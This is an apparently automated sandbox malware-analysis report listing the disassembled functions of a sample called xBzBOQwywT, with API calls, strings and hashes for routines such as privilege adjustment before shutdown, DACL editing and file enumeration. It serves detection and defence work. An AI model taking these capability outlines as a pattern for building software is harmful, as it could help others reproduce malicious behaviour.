                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                        • String ID: $@OH$default$winsta0
                                                                        • API String ID: 3324942560-3791954436
                                                                        • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                        • Opcode Fuzzy Hash: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                                                                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                        Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 999945258-2428617273
                                                                        • Opcode ID: 0f095038acdd7ac02838cf930404896e0365a825e7f4f628a9cf1bdfdd766fd8
                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                        • Opcode Fuzzy Hash: 0f095038acdd7ac02838cf930404896e0365a825e7f4f628a9cf1bdfdd766fd8
                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                        Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                        Strings
                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                        • _, xrefs: 0040371C
                                                                        • Unterminated string, xrefs: 00428348
                                                                        • Error opening the file, xrefs: 00428231
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                        • API String ID: 3393021363-188983378
                                                                        • Opcode ID: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                        • Opcode Fuzzy Hash: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                        Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1409584000-438819550
                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                        Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2192556992-3457252023
                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                        Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                        • String ID: %.3d
                                                                        • API String ID: 3337348382-986655627
                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                        Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 2640511053-438819550
                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                        Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2938487562-3733053543
                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                        Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                        • String ID:
                                                                        • API String ID: 1255039815-0
                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                        Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                        • String ID:
                                                                        • API String ID: 1158019794-0
                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                        Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                        Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
